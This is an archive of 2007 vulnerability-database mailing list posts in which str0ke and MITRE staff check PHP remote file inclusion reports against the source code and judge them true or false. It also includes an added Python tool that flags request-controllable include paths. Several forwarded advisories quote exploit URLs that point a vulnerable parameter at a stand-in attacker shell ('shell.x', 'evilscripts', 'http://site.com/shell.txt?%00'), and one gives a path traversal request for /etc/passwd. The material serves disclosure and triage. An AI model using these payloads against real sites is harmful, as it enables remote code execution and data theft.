From str0ke at milw0rm.com Thu Feb 1 09:52:47 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 1 Feb 2007 08:52:47 -0600
Subject: [VIM] False: drake_0.2.10 => (d_root) Remote File Include Exploit
Message-ID: <814b9d50702010652r72c36eo6282dfd83bbdca5b@mail.gmail.com>

Received this today which shouldn't work.

> require 'version.php';

contains

$d_root = str_replace('\\','/', dirname(__FILE__)).'/';

Looking over the other includes further down the line, they do not contain any kind of $_GET extracts.

/str0ke

Xmor$ DigitaL Hacking TeaM
# drake_0.2.10 => (d_root) Remote File Include Exploit
# Script.............. : drake CMS
# Discovered by.... : the_Edit0r
# Location .......... : Iran
# Class.............. : Remote
# Original Advisory : http://Www.Xmors.com ( Public ) http://Www.Xmors.net (priv8)
# We ArE : Scorpiunix , KAMY4r , SilliCONIC , Zer0.C0d3r
# D3vil_B0y_ir , Tornado , DarkAngel , S.W.A.T
# download: http://www.kre8webdesign.com/media/download/linx-zip.zip

In the documentation it contains:

Open up /new-pages/add.php and /new-pages/search.php and edit the second line down in each file to point to the absolute path of config.inc.php on your webserver.

include("/www/the/path/to/your/linx/admin/config.inc.php");
include($base_admin_path."templates/submit-rules.php");

config.inc.php contains:

$base_admin_path = '/www/path/to/linx/admin/';

Seems this script isn't vulnerable after installing the app correctly.

/str0ke

-------- received email edited below.

http://[target]/[path]//new-pages/add.php?base_admin_path=[SHELL]

Example:
//new-pages/add.php?base_admin_path=http://[target]/[path]/shell.x

From str0ke at milw0rm.com Thu Feb 1 10:15:43 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 1 Feb 2007 09:15:43 -0600
Subject: [VIM] true but: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability
Message-ID: <814b9d50702010715n103da86apd770d2d1bda45e03@mail.gmail.com>

The program is vulnerable: $config[sipssys] is the first line of code in the file box.inc.php.
But the documentation states:

Unpack the sips archive file. Sips requires a special directory where it stores all kinds of data such as users, stories and php code. This directory can be anywhere, but if you can, you should place it outside of the public html area of the server, for security reasons.

So it's kind of a coin toss-up.

/str0ke

http://sourceforge.net/projects/sips/

//sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x

From str0ke at milw0rm.com Thu Feb 1 10:23:16 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 1 Feb 2007 09:23:16 -0600
Subject: [VIM] true: phpEventMan RFI Vuln.
Message-ID: <814b9d50702010723u200e4537hafe633c5fcc86dd6@mail.gmail.com>

The first line of code in both files:

common.function.php
include_once($level."Shared/sharedfunctions.php");

text.ctrl.php
include_once($level."UserMan/controller/common.function.php");

/str0ke

-----------------------------------------------
phpEventMan v1.0.2 (level) Remote File Include Exploit
-----------------------------------------------
Author: Cyber-Security cyber-security.org
-----------------------------------------------
Code:
include_once($level."UserMan/controller/common.function.php");
include_once($level."Shared/sharedfunctions.php");
-----------------------------------------------
POC:
www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ?
-----------------------------------------------
download: http://sourceforge.net/project/showfiles.php?group_id=169887
-----------------------------------------------
Reference: http://www.cyber-security.org/DataDetayAll.asp?Data_id=594

From str0ke at milw0rm.com Thu Feb 1 14:07:21 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 1 Feb 2007 13:07:21 -0600
Subject: [VIM] True: Somery 0.4.6 (skindir install.php) Remote file include
Message-ID: <814b9d50702011107u2e9d6d15l6da47f7e0af3fd6d@mail.gmail.com>

The install.php file is supposed to be removed after installation, at least it's stated in the documentation; then again, the product doesn't need the install.php file to be removed to run.

install.php
------------------------------
include("config.php");
include("$skindir/header.php");
extract($_POST);
extract($_GET);

line 208:
include("$skindir/footer.php");

*******************************************************************************
ConTact:-wWw.Asb-May.Net
Greatz to:AsB-MaY TeAm & HaCk.eGy & To0oFa
ScRiPt:-http://somery.danwa.net
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs GrOuP}>>
********************************************************************************
install.php:-
include("$skindir/footer.php");
********************************************************************************
ExPlOiT:
http://www.Site.com/Upload/install.php?skindir=[Shell]

From str0ke at milw0rm.com Thu Feb 1 14:14:37 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 1 Feb 2007 13:14:37 -0600
Subject: [VIM] true: Epistemon 1.0 <= Remote File Include Vulnerability
Message-ID: <814b9d50702011114r53e5c95asf2eeaac78565bad8@mail.gmail.com>

First line of code in common.inc.php is

include($inc_path.'config.php');

/str0ke

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Epistemon 1.0 <= Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_ at W.Cn
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL: http://sourcesup.cru.fr/frs/download.php/668/Epistemon_V1.tgz
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
V.CODE: In : /plateforme/code/inc/common.inc.php

include($inc_path.'config.php');
include ($inc_path."i18n.inc.php");
include ($inc_path."const.inc.php");
include ($inc_path."c_init.inc".$ext);
include ($inc_path."c_chapitre.inc".$ext);
include ($inc_path."c_color.inc".$ext);
include ($inc_path."c_connexion.inc".$ext);
include ($inc_path."c_file.inc".$ext);
include ($inc_path."c_formation.inc".$ext);
include ($inc_path."c_groupe.inc".$ext);
include ($inc_path."c_header.inc".$ext);
include ($inc_path."c_mail.inc".$ext);
include ($inc_path."c_membre.inc".$ext);
include ($inc_path."c_webmail.inc".$ext);
include ($inc_path."c_module.inc".$ext);
include ($inc_path."c_mysql.inc".$ext);
include ($inc_path."c_phorum.inc".$ext);
include ($inc_path."c_tuteur.inc".$ext);
include ($inc_path."c_document.inc".$ext);
include ($inc_path."html.inc".$ext);
include ($inc_path."c_complement.inc".$ext);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.hedef.com/[path]/plateforme/code/inc/common.inc.php?inc_path=Evil.txt
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From str0ke at milw0rm.com Thu Feb 1 14:52:41 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 1 Feb 2007 13:52:41 -0600
Subject: [VIM] true: WebBuilder <= 2.0 Remote File Include Vulnerability
Message-ID: <814b9d50702011152t1e437356gda8121b165bfd42b@mail.gmail.com>

The first line of code contains:
require_once($GLOBALS['core']['module_path'].'/module_common.php');

After looking at the www directory it contains an .htaccess file with the following.

php_flag zlib.output_compression off
php_flag short_open_tag off
php_flag register_globals off
php_flag asp_tags off
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off

I thought maybe the library directory wasn't supposed to be accessed by http requests since there isn't an .htaccess file for it.

INSTALLATION notes:

To install the WebBuilder simply point your browser at www/index.php and enter any requested information. This will setup your database and core configuration.

This shows accessing the library directory shouldn't be an issue.

/str0ke

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
WebBuilder <= Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_ at W.Cn
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL:
http://oss.backendmedia.com/snapshots/webbuilder2-2006-08-18.zip
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
V.CODE: In : /library/StageLoader.php

require_once($GLOBALS['core']['module_path'].'/module_common.php');
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://victim.com/[path]/library/StageLoader.php?GLOBALS[core][module_path]=Evil.txt?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com & Google.Com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From coley at linus.mitre.org Thu Feb 1 14:57:27 2007
From: coley at linus.mitre.org (Steven M. Christey)
Date: Thu, 1 Feb 2007 14:57:27 -0500 (EST)
Subject: [VIM] true but: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability
In-Reply-To: <814b9d50702010715n103da86apd770d2d1bda45e03@mail.gmail.com>
References: <814b9d50702010715n103da86apd770d2d1bda45e03@mail.gmail.com>
Message-ID:

On Thu, 1 Feb 2007, str0ke wrote:

> But the documentation states.
>
> Unpack the sips archive file. Sips requires a special directory where it
> stores all kinds of data such as users, stories and php code. This directory
> can be anywhere, but if you can, you should place it outside of the public
> html area of the server, for security reasons.
>
> So it's kind of a coin toss-up.

Probably worth noting in the CVE when we make it, but I think it's still reasonable to track these, since we know how frequently admins would skip this configuration step - or perhaps be forced into keeping the insecure configuration due to other factors.

- Steve

From str0ke at milw0rm.com Thu Feb 1 16:57:56 2007
From: str0ke at milw0rm.com (str0ke)
Date: Thu, 1 Feb 2007 15:57:56 -0600
Subject: [VIM] Fwd: php web portail [remote file include & local file include]
In-Reply-To: <20070201185244.433.qmail@securityfocus.com>
References: <20070201185244.433.qmail@securityfocus.com>
Message-ID: <814b9d50702011357mdf1a71cw2672b14ee665838b@mail.gmail.com>

The local include doesn't seem right.

/index.php

$site_path="./";

Remote does.
/includes/includes.php

define("PHPVERSION","php");
// sets the class path according to the PHP version
if(PHPVERSION =="php5"){
    define("CLASS_PATH",$site_path."includes/classes/php5/");
}else{
    define("CLASS_PATH",$site_path."includes/classes/php4/");
    define("PHPVERSION","php");
}
include_once($site_path."includes/function/function.php");

/str0ke

---------- Forwarded message ----------
From: saps.audit at gmail.com
Date: 1 Feb 2007 18:52:44 -0000
Subject: php web portail [remote file include & local file include]
To: bugtraq at securityfocus.com

php web portail [remote file include & local file include]

download site: https://sourceforge.net/project/showfiles.php?group_id=178400
product: php web portail
bug: remote file include & local file include
risk: high

local file include:
/index.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd

remote file include:
/includes/includes.php?site_path=http://site.com/shell.txt?%00

Laurent Gaffié
http://s-a-p.ca/
contact: saps.audit at gmail.com

From str0ke at milw0rm.com Fri Feb 2 09:36:47 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 2 Feb 2007 08:36:47 -0600
Subject: [VIM] false: calendar = Remote File Include Vulnerability
Message-ID: <814b9d50702020636m289af696x1c2aa269736d741e@mail.gmail.com>

First line of code is below.

$calpath = "/home/swentel/projects/calendar/";

Another false.

/str0ke

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Calendar <= Remote File Include Vulnerability
URL: http://fresh.t-systems-sfr.com/unix/src/privat2/calendar.tar.gz
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
V.CODE: In : calendar/cal_config.inc.php <<<<=====>>>> Line : 48
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.XXX.com/[Calendar_path]/cal_config.inc.php?calpat=hhttp://sheLL?
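The true/false calls on this list all come down to the same first-pass question: is the variable at the root of the include path set by the file before the include runs, or can the request supply it (register_globals) or overwrite it afterwards (extract($_GET), as in the Somery install.php case)? As an added example, not code from the VIM list or from any of the packages it discusses, the Python helper below mechanises that triage. Its PHP snippets are constructed to resemble the patterns reported above (an unset $level, a hard-coded $calpath, a $skindir clobbered by extract(), a define()d SITE_PATH) and are not the real files; the function and verdict names are my own.

```python
"""Static triage of include/require paths in a PHP file.

Added example for this thread; it is not code from the VIM list or from any
of the packages discussed, and the PHP snippets at the bottom are constructed
to mirror the patterns the list members check by hand.  Heuristics are
line-based: comments are blanked, string contents are not tokenised, and an
include whose argument starts with a function call is not reported.
"""
import re

# include/require[_once], optional "(", optional quote, then $var or CONSTANT.
INCLUDE_RE = re.compile(
    r'\b(?i:include|require)(?:_once)?\s*\(?\s*"?\s*'
    r'(?:\$(\w+)|([A-Z_][A-Z0-9_]*)\b)')
# $var = ... or $var['k'][j] = ... ; (?!=) rejects ==, and !=, <=, >= never
# reach the '=' because their first character is not '='.
ASSIGN_RE = re.compile(r'\$(\w+)\s*(?:\[[^\]]*\]\s*)*=(?!=)')
DEFINE_RE = re.compile(r'\bdefine\s*\(\s*[\'"](\w+)[\'"]')
REQUEST_RE = re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\b')
# Calls that pull request data into the local symbol table after the fact.
EXTRACT_RE = re.compile(
    r'\bextract\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b|'
    r'\bimport_request_variables\s*\(')
COMMENT_RE = re.compile(r'//[^\n]*|#[^\n]*|/\*.*?\*/', re.DOTALL)


def _strip_comments(src):
    # Replace each comment with its own newlines so line numbers survive.
    return COMMENT_RE.sub(lambda m: '\n' * m.group(0).count('\n'), src)


def triage(src):
    """Return [(line, name, verdict, note)] for every variable- or
    constant-rooted include in one PHP source file."""
    assigned, from_request, defined, extracts, findings = {}, {}, {}, [], []
    for no, line in enumerate(_strip_comments(src).splitlines(), 1):
        if EXTRACT_RE.search(line):
            extracts.append(no)
        for m in ASSIGN_RE.finditer(line):
            assigned.setdefault(m.group(1), no)
            if REQUEST_RE.search(line):
                from_request.setdefault(m.group(1), no)
        for m in DEFINE_RE.finditer(line):
            defined.setdefault(m.group(1), no)
        for m in INCLUDE_RE.finditer(line):
            var, const = m.group(1), m.group(2)
            if const is not None:
                if const.startswith('__'):        # __FILE__, __DIR__: set by PHP
                    continue
                if const in defined:
                    findings.append((no, const, 'CONSTANT',
                        'define()d at line %d; not request-controllable' % defined[const]))
                else:
                    findings.append((no, const, 'UNDEFINED',
                        'constant is not define()d in this file; check where it is set'))
            elif var not in assigned:
                findings.append((no, var, 'RFI',
                    '$%s is never set before the include; with register_globals=On '
                    'the request supplies it' % var))
            elif var in from_request:
                findings.append((no, var, 'RFI',
                    '$%s is assigned from request data at line %d' % (var, from_request[var])))
            else:
                hit = next((e for e in extracts if assigned[var] <= e < no), None)
                if hit is None:
                    findings.append((no, var, 'ASSIGNED',
                        '$%s is set at line %d before the include; likely a false report'
                        % (var, assigned[var])))
                else:
                    findings.append((no, var, 'TAINTED',
                        '$%s is set at line %d but extract()/import_request_variables() '
                        'at line %d can overwrite it' % (var, assigned[var], hit)))
    return findings


# Constructed PHP samples (not the real files from the reports above).
SAMPLE_RFI = '<?php\ninclude_once($level."Shared/sharedfunctions.php");\n'
SAMPLE_FALSE = ('<?php\n$calpath = "/home/swentel/projects/calendar/";\n'
                'include($calpath . "cal_lang.inc.php");\n')
SAMPLE_EXTRACT = ('<?php\n$skindir = "skins/default";\n'
                  'include("$skindir/header.php");\nextract($_POST);\n'
                  'extract($_GET);\ninclude("$skindir/footer.php");\n')
SAMPLE_CONST = ("<?php\ndefine('SITE_PATH', '/var/www/htdocs/');\n"
                "require SITE_PATH.'inc/lib.inc.php';\n")

if __name__ == '__main__':
    for label, src in [('rfi', SAMPLE_RFI), ('false', SAMPLE_FALSE),
                       ('extract', SAMPLE_EXTRACT), ('const', SAMPLE_CONST)]:
        for no, name, verdict, note in triage(src):
            print('%-8s line %d  %-9s %-10s %s' % (label, no, name, verdict, note))
```

An RFI verdict from this script is only the starting point; it still needs the checks the thread applies by hand: whether the file is reachable over HTTP at all, whether the documented install steps leave the variable unset, and whether register_globals is actually on for the deployment (the WebBuilder .htaccess above turns it off for www/ but not for library/).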
From str0ke at milw0rm.com Fri Feb 2 09:51:42 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 2 Feb 2007 08:51:42 -0600
Subject: [VIM] false: phpoll-1.1 <= Remote File Include Vulnerability
Message-ID: <814b9d50702020651o1c12d49dvec6e997087621a1f@mail.gmail.com>

Isn't vulnerable; the variable isn't correctly used on line 290: polldir is actually pollDir and is inside of a function. Installed it for testing; it is not vulnerable.

/str0ke

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
phpoll-1.1 <= Remote File Include Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
URL: http://fresh.t-systems-sfr.com/unix/src/privat2/phpoll-1.1.tgz
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
V.CODE: In : /phpoll.php <<<<=====>>>> Line :290
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
http://www.victimes.com/[phpoll_path]/phpoll.php?polldir=http://sheLL?
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From str0ke at milw0rm.com Fri Feb 2 10:13:33 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 2 Feb 2007 09:13:33 -0600
Subject: [VIM] true: DreamStats V 4.2=(index.php)=>Remote File Include
Message-ID: <814b9d50702020713m4be8dfcag49cbc80317796200@mail.gmail.com>

The section that matters is lines 17-22.

// +---------------------------------------------+
// | Copyright (c) 2004 - 2005 mnProjects        |
// | http://www.mnprojects.com                   |
// | DreamStats System by Miguel Nunes           |
// +---------------------------------------------+

error_reporting(E_ALL ^ E_NOTICE);

// D r e a m S t a t s
//
// For Call of Duty 2 version 1.0

define('in_main', true);
define('in_dreamstats', true);

if (!isset($_GET['server'])) {

################################### Includes ###################################

@include($rootpath . 'includes/ip_vers.php');
@include($rootpath . 'includes/core.php');

That's about as vulnerable as we get. This is for version 4.2 (4.1 and below were not downloadable); 5.0 isn't vulnerable.

/str0ke

ConTact Me:-wWw.Asb-May.Net
ScRiPt:-http://callofduty.filefront.com/file/DreamStats_System;54520
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs TeAm}>>
******************************************************************************
index.php:-
if (!$slots) {include($rootpath . 'html/serveroffline.php');exit;}
********************************************************************************
ExPlOiT:-http://www.Site.com/PaTh/upload/index.php?rootpath=[Shell]
********************************************************************************

From str0ke at milw0rm.com Fri Feb 2 10:44:12 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 2 Feb 2007 09:44:12 -0600
Subject: [VIM] true: Flipper Poll v1.1.0 (poll.php) RFI Vuln.
Message-ID: <814b9d50702020744m562153e0x29306c2ae32fb200@mail.gmail.com>

First line of code.

include_once($root_path . 'config.php');

/str0ke

Flipper Poll v1.1.0 (poll.php) remote file include vuln
---------------------------------------------------------------------------------
Found: Cyber-Security cyber-security.org
---------------------------------------------------------------------------------
Script Download: http://sourceforge.net/project/showfiles.php?group_id=59828
---------------------------------------------------------------------------------
Vuln Code:
include_once($root_path . 'config.php');
---------------------------------------------------------------------------------
Exploit:
/poll.php?root_path=evilscripts?
---------------------------------------------------------------------------------
Reference: http://www.cyber-security.org/DataDetayAll.Asp?Data_id=596
---------------------------------------------------------------------------------

From str0ke at milw0rm.com Fri Feb 2 10:53:29 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 2 Feb 2007 09:53:29 -0600
Subject: [VIM] false: MySpeach v3.0.6 Remote File Inclusion
Message-ID: <814b9d50702020753v778b9425teae27999ec4c3410@mail.gmail.com>

first lines of code.

if(!@file_exists($my_ms['root'].'/admin/config.php')){
    exit('MySpeach n est pas encore installé.');
}
include_once("admin/config.php");
$my_ms['root']=$my_ms["absolu_root"].$my_ms["repertoire"];
include($my_ms['root'].'/chat.php');

admin/config.php initializes $my_ms["absolu_root"].

if(!isset($_GET['chm'])){ $_GET['chm']=''; }
if(!isset($_GET['rqst'])){ $_GET['rqst']=''; }
if(!isset($_GET['count'])){ $_GET['count'] = ''; }
if(!isset($_GET['titre'])){ $_GET['titre'] = ''; }
// :: end of definitions
//::: location of myspeach
$my_ms['root']='../myspeach';
if(isset($_GET['my_ms[root]'])) {
    exit('et la marmotte elle fais quoi?');
}
// check that $my_ms['root'] is set, that it does not contain code that could include a page from another site, and that the file really exists on this server.
if($my_ms["root"] != '' AND file_exists($my_ms["root"].'/error.php') AND !eregi(':/',$my_ms["root"]))

/str0ke

* Portal Name = MySpeach v3.0.6
* Class = Remote File Inclusion
* Risk = High
* Download = ftp://ftp1.comscripts.com/PHP/1386_myspeach-306.zip
**********************************************************************************
- Exploit:
http://www.site.com/[script path]/chat.php?my_ms[root]=[evil host]
http://www.site.com/[script path]/chat_exemple.php?my_ms[root]=[evil host]
http://www.site.com/[script path]/chat_rqst.php?my_ms[root]=[evil host]
http://www.site.com/[script path]/jscript.php?my_ms[root]=[evil host]
***********************************************************************************

From str0ke at milw0rm.com Fri Feb 2 12:04:01 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 2 Feb 2007 11:04:01 -0600
Subject: [VIM] FALSE: PHP LIGHTNING PORTAL (PLP) v.2.0 Remote File Inclusion
Message-ID: <814b9d50702020904q52166d3di40b0724d1eff48ef@mail.gmail.com>

define('SITE_PATH','/var/www/htdocs/'); //with trailing "/"
require SITE_PATH.'inc/lib.inc.php';

Enough said.
/str0ke

* Portal Name = PHP LIGHTNING PORTAL (PLP) v.2.0
* Class = Remote File Inclusion
* Risk = High
* Download = http://www.alarit.com/downloads/products/plp_2_0_demo.zip
**********************************************************************************
- Exploit:
http://www.site.com/[script path]/inc/application.php?SITE_PATH=[evil host]
***********************************************************************************

From str0ke at milw0rm.com Fri Feb 2 12:16:49 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 2 Feb 2007 11:16:49 -0600
Subject: [VIM] Fwd: ACGV Comment 1.0
Message-ID: <814b9d50702020916l4d3ee875v632c73e42a43d39@mail.gmail.com>

function.inc.php only contains functions that are never called.

/str0ke

File Corrupted: function.inc.php

require($GLOBALS["pathcom"]."config/comment.inc.php");
require($GLOBALS["pathcom"]."config/langue/"."$langue".".php");
********************************************************************************
Exploit:
http://www.Site.com/config/function.inc.php?GLOBALS[pathcom]=Evil Script
********************************************************************************

From f.riphagen at nsec.nl Fri Feb 2 12:25:34 2007
From: f.riphagen at nsec.nl (Ferdy Riphagen)
Date: Fri, 02 Feb 2007 18:25:34 +0100
Subject: [VIM] true: Flipper Poll v1.1.0 (poll.php) RFI Vuln.
In-Reply-To: <814b9d50702020744m562153e0x29306c2ae32fb200@mail.gmail.com>
References: <814b9d50702020744m562153e0x29306c2ae32fb200@mail.gmail.com>
Message-ID: <45C3740E.60300@nsec.nl>

str0ke wrote:
>
> Flipper Poll v1.1.0 (poll.php) remote file include vuln
> ---------------------------------------------------------------------------------
>
> Found: Cyber-Security
> cyber-security.org
> -

I've noticed this one multiple times, now and mid 2006, all from different authors (I assume):

http://archives.neohapsis.com/archives/bugtraq/2006-07/0187.html (XORON)
http://archives.neohapsis.com/archives/bugtraq/2006-06/0275.html (SpC-X)

--Ferdy--

From str0ke at milw0rm.com Fri Feb 2 12:28:12 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 2 Feb 2007 11:28:12 -0600
Subject: [VIM] true: phpBB ezBoard converter 0.2 (ezconvert_dir) Remote File Include Exploit
Message-ID: <814b9d50702020928s1fe8cfd2nc733936cbfa7bf6b@mail.gmail.com>

link: http://www.milw0rm.com/exploits/3258

config.php?ezconvert_dir=

First line of code:

include ($ezconvert_dir . 'ezboard-parse.' . $phpEx);

/str0ke

From str0ke at milw0rm.com Fri Feb 2 12:34:36 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 2 Feb 2007 11:34:36 -0600
Subject: [VIM] phpBB++ Build 100 (phpbb_root_path) Remote File Include Exploit
Message-ID: <814b9d50702020934k40fd27abpc4c7a6dc3f3edc03@mail.gmail.com>

http://www.milw0rm.com/exploits/3259

First line of code.

include_once( $phpbb_root_path . './includes/functions_categories_hierarchy.' . $phpEx );

/str0ke

From heinbockel at mitre.org Fri Feb 2 15:43:32 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Fri, 2 Feb 2007 15:43:32 -0500
Subject: [VIM] Local File Inclusion inconclusive in PwP (was Fwd: php web portail [remote file include & local fileinclude])
In-Reply-To: <814b9d50702011357mdf1a71cw2672b14ee665838b@mail.gmail.com>
References: <20070201185244.433.qmail@securityfocus.com> <814b9d50702011357mdf1a71cw2672b14ee665838b@mail.gmail.com>
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC018CF1C3@IMCSRV5.MITRE.ORG>

>-----Original Message-----
>From: vim-bounces at attrition.org [mailto:vim-bounces at attrition.org] On Behalf Of str0ke
>Sent: Thursday, 1 February 2007 16:58
>To: Vulnerability Information Managers
>Subject: [VIM] Fwd: php web portail [remote file include & local fileinclude]
>
>The local include doesn't seem right.
>
>/index.php
>
>$site_path="./";
>

Right, it doesn't seem right, because you're looking at the wrong parameter ;-)

The original PoC was for the page parameter.

/index.php?page=../../../../../../../../../../../../../../../../../../../etc/passwd

After doing some further digging, it is still unclear as to whether the issue is valid. index.php includes includes/includes.php, which includes includes/function/function.php, which is used by includes.php to import every file under includes/classes/php4/. This ends up including roughly 50 other PHP files...

Looking for use of the $page variable shows that system/compteur/Compteur.class.php and system/redirection.class.php may be vulnerable. However, I did not spend the time to dig through call stacks to see if the functions are ever called starting from index.php.

In the end, CVE calls this inconclusive... Too many vulnerabilities, too little time.

BTW, str0ke was right with the RFI; that one is definitely possible.

William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

From str0ke at milw0rm.com Fri Feb 2 16:15:55 2007
From: str0ke at milw0rm.com (str0ke)
Date: Fri, 2 Feb 2007 15:15:55 -0600
Subject: [VIM] Local File Inclusion inconclusive in PwP (was Fwd: php web portail [remote file include & local fileinclude])
In-Reply-To: <224FBC6B814DBD4E9B9E293BE33A10DC018CF1C3@IMCSRV5.MITRE.ORG>
References: <20070201185244.433.qmail@securityfocus.com> <814b9d50702011357mdf1a71cw2672b14ee665838b@mail.gmail.com> <224FBC6B814DBD4E9B9E293BE33A10DC018CF1C3@IMCSRV5.MITRE.ORG>
Message-ID: <814b9d50702021315j76a522e0j55eb8bac27c0b29a@mail.gmail.com>

On 2/2/07, Heinbockel, Bill wrote:
> Right, it doesn't seem right, because you're looking at the wrong
> parameter ;-)

Go figure, I blame lack of sleep :)

/str0ke

From coley at mitre.org Sat Feb 3 16:42:52 2007
From: coley at mitre.org (Steven M. Christey)
Date: Sat, 3 Feb 2007 16:42:52 -0500 (EST)
Subject: [VIM] FLIP SQL injection clarification
Message-ID: <200702032142.l13LgqbI019555@faron.mitre.org>

Ref: CONFIRM:http://sourceforge.net/project/shownotes.php?release_id=481131&group_id=98260

Rough translation is "SQL Injection continues to decrease, through escape_sqlData(), implode_sql(), implode_sqlIn() which all implode()s in Queries replaces and all data escape."

Some sources are reporting these as the vulnerable functions, but certainly the escape_sqlData name suggests some kind of quoting, so an alternate interpretation is that the vendor is USING these functions as protection schemes to protect against SQL injection in various other functions.

A big diff between RC2 and RC3 highlights this...
diff -r flip-rc2/web/catering.php flip-rc3/web/catering.php
< $bids = "b.`id`='".implode("' OR b.`id`='", $post["ids"])."'";
< $ids = "`id`='".implode("' OR `id`='", $post["ids"])."'";
---
> $bids = "b.`id` IN (".implode_sqlIn($post["ids"]).")";
> $ids = "`id` IN (".implode_sqlIn($post["ids"]).")";

diff -r flip-rc2/web/core/core.mysql.php flip-rc3/web/core/core.mysql.php
< if(is_null($val)) $Values[$col] = "`$col` = NULL";
